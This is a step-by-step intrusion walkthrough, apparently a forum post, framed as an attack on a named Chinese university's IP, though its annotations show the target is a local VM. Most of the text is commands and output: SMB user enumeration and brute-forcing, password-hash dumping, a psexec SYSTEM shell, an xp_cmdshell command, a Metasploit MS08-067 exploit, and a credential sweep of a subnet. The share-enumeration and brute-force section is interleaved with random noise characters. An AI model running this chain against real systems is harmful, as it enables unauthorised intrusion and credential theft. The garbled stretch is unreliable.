Guangxi Normal University site: http://202.103.242.241/

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc         Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds

// The -sV pass already pins the box down: Windows 2000 (c:\winnt paths, microsoft-ds on 445) with SMB on 139/445 and RDP on 3389 exposed, which is what every later step leans on. Also worth noting before going further: the 08:00:27 OUI (Cadmus Computer Systems) is VirtualBox's, and every scan below shows sub-millisecond latency, so the "site" is a local VM, not a live server on the Internet.
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb   // list the SMB scripts
-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
// use the script to enumerate the account names that exist on the remote machine

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser   // scan result

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds

// No credentials were given, so this list came back over an anonymous (null) session, which Windows 2000 allows by default (RestrictAnonymous=0). Four accounts, and the names alone already suggest two things to try: a throwaway "test" account and a blank Administrator password.
- R5 H H7 W, \2 T% G z* Vroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241 % W' U3 V0 H, o4 D8 P9 C+ ^
$ ?8 V6 |8 f1 E3 F& J0 d( X: R3 C//查看共享
i& X" |9 u( _# _4 _, I& a
) o$ b% A- s. I7 T. A5 x$ rStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST8 a3 Z$ ^! k& }9 B, v4 j
; M9 H! P6 ]5 q1 c3 j) H6 RNmap scan report for bogon (202.103.242.241)
" `0 U2 H! Q2 V# Z# P) B7 h' v& ]
Host is up (0.00035s latency).
2 f& f% `% I3 O6 ^6 r3 y$ A; z" x' h, n7 [/ ]- z4 T, ?
Not shown: 993 closed ports; r: Q) I- ?6 S& r0 d8 }
' G4 P7 G e! ^$ EPORT STATE SERVICE |2 w6 H. W3 C. w
. O1 [3 T+ t" V+ b+ [135/tcp open msrpc
, H5 P5 a' \0 @! V, k# O. ]5 P2 _1 d% o1 d( [. K
139/tcp open netbios-ssn
: O( z: S1 q8 W" O& ?8 j& K2 v u# X; d! j! r, D7 g/ _7 n
445/tcp open microsoft-ds
8 B* p5 P1 A! H: G, I6 l; L. B9 q0 Z: [+ e# A- s0 O
1025/tcp open NFS-or-IIS
$ R+ Y( F$ z' v8 y* V! \. }/ t' D% n
1026/tcp open LSA-or-nterm
. X& t* s; z# {1 t1 ^
: |1 ?8 E- n! w6 _: M3372/tcp open msdtc4 e" U; C; e& g$ q1 Z
8 D# K/ g, x# K( Y5 w) m7 y7 e
3389/tcp open ms-term-serv
( H! B. @$ Q8 ]5 i, I1 S: v; O/ }' @; z$ a, C$ F! K) n4 D: A$ X
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)$ C+ Y V$ S7 o+ L
" b3 n4 j0 p* S3 T5 MHost script results: `' T# Q+ ~' i
& ~/ O; I6 D5 l6 i
| smb-enum-shares:
# e G/ v; I0 ^$ t: H0 f D5 @' r% H3 C( M3 y$ g5 `
| ADMIN$0 W A# Q: n3 J8 C) O) Z( Y5 I
" N! Y# s2 ^6 B9 _: M| Anonymous access: <none>. [& {. t9 e M' L! L5 T' s1 N
+ g- g- o* u7 |9 `. ^$ v| C$
7 {: J% ~& C8 j- z# q1 ]6 h, z& {4 ^- c8 `
| Anonymous access: <none>
* h" d$ y! m( B) x1 z; w# ?- R
0 ~2 D m+ Y# y, W8 t* u7 D| IPC$$ e5 K' t0 w$ w, g: H4 a
) ^5 I/ k! m' E) B
|_ Anonymous access: READ
7 J M; y+ R3 y# E( } {0 s4 U9 j0 P. |1 a3 t
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds s/ x; e2 ?; ]8 h
8 A7 |4 U- b- kroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241 0 s5 G+ M6 X/ J5 o
3 a7 M6 A$ q2 ]) m* k0 {//获取用户密码
, v9 r$ W6 Z" }, |5 d( X
9 t s9 K$ c1 Y% Z8 I, VStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST: a: m5 n Z/ z* C4 H1 K& T
, `6 H+ ^: O; ~. t& MNmap scan report for bogon (202.103.242.2418)
* S" U" ]3 J1 f9 e! i8 S+ G
* I E$ G6 p$ q0 @$ R @/ eHost is up (0.00041s latency). D+ T: [8 \7 w7 I7 u
, V6 u/ m; o5 [0 V. M) D
Not shown: 993 closed ports5 v" {1 N$ V: K6 x
! m* C1 c0 l. E. X
PORT STATE SERVICE
8 }3 ]6 J6 S$ i( W1 Y) {$ n! ]" P
3 V0 @3 x( F0 B0 |6 C: r/ i135/tcp open msrpc
6 ?. G" p8 W# Q' b+ b: @1 R. o8 K& @9 P) U. ?
139/tcp open netbios-ssn
6 A8 ]4 n4 u) [
( C( I+ J5 U6 p445/tcp open microsoft-ds
! c2 y+ C! E s: h5 T
% |. H A" Y# z0 V2 Q/ Z' a1025/tcp open NFS-or-IIS
5 q, h; F! p$ Y2 M4 E6 A0 f, z% q; d3 f3 d
1026/tcp open LSA-or-nterm
9 L- u# g- |9 N) X3 z% k5 b
& A& w5 O9 O0 \" z3372/tcp open msdtc5 G! o e" D- H6 K
( Z6 j6 ~. i7 G3 d0 I5 w
3389/tcp open ms-term-serv$ `) {7 j& C: D9 ~* {
/ @. }! e$ y" p: `. d$ H$ c8 pMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)+ n! g6 A) r) z) i
6 }. J/ @3 r( l, oHost script results:
. X4 ~4 Z0 f' \+ G6 j' V' e" G3 Q* H7 _
| smb-brute:
7 f. v- D: O0 j* i: q: _
1 K+ c9 `1 e2 j+ ]4 C/ Cadministrator:<blank> => Login was successful
6 }* g; |6 w( @8 f7 N* Q
, j; g" {6 V! ^) N! e6 K" C|_ test:123456 => Login was successful) w& j6 U( \. x K0 ~7 _" Y
% @' I# A* |# l% {& Q) m
Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
5 U& Y% y9 ~$ p: L. j$ o0 d7 w0 Z' U& l
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2   // grab the hashes
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

// smb-pwdump.nse pushes the pwdump6 binaries from nselib/data over the ADMIN$ share and runs them as a service (the same mechanism as smb-psexec), so it only works with an account that is a local administrator on the target. The fact that it succeeds as "test" tells you that throwaway account is in the local Administrators group.

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
|   Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
|   Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
|   test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_  TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe   // get a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig
Windows 2000 IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 202.103.242.241
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 202.103.1.1

// PsExec works the same way as smb-pwdump did: it copies its service binary to ADMIN$ and starts it through the service control manager, so again this needs "test" to be a local administrator. The shell runs as SYSTEM, which is why the prompt lands in C:\WINNT\system32.

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user'"   // log in remotely as sa and run a command

// No output is recorded for this step, and 1433/tcp was not among the seven open ports in the scan, so the osql/xp_cmdshell path is shown as an idea rather than something confirmed against this host.
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241   // check the target for known vulnerabilities

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds

// smb-check-vulns runs only its non-destructive checks unless --script-args unsafe=1 is given; the MS08-067 check is one of the safe ones, so this is a reliable signal that the Server service has never been patched. That gives a third way in that needs no credentials at all.
root@bt:~# msfconsole   // exploit MS08-067 against the target from msf

msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf exploit(ms08_067_netapi) > show payloads
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > exploit
meterpreter >
Background session 2? [y/N] (ctrl+z)
msf exploit(ms08_067_netapi) > sessions -l

// The target was left at its default of automatic detection, which is fine for a stock Windows 2000 box. bind_tcp works here because the attacker can reach the VM directly; with a firewall or NAT in between, a reverse payload (windows/meterpreter/reverse_tcp with LHOST set) is the one to pick.
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator

root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
// use the user names and the captured hash to try logging in across the whole internal subnet

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful

// Two things to read carefully in this result. The only hit is administrator with a blank password; the LM hash of "test" in password.txt produced no successful login, so the pass-the-hash part of the sweep is not demonstrated here. And 192.168.1.105 reports the same 08:00:27 ... MAC address and the same port set as 202.103.242.241, so the "subnet sweep" found the same VM again rather than a second internal host.

Attack successful: a simple msf + nmap attack.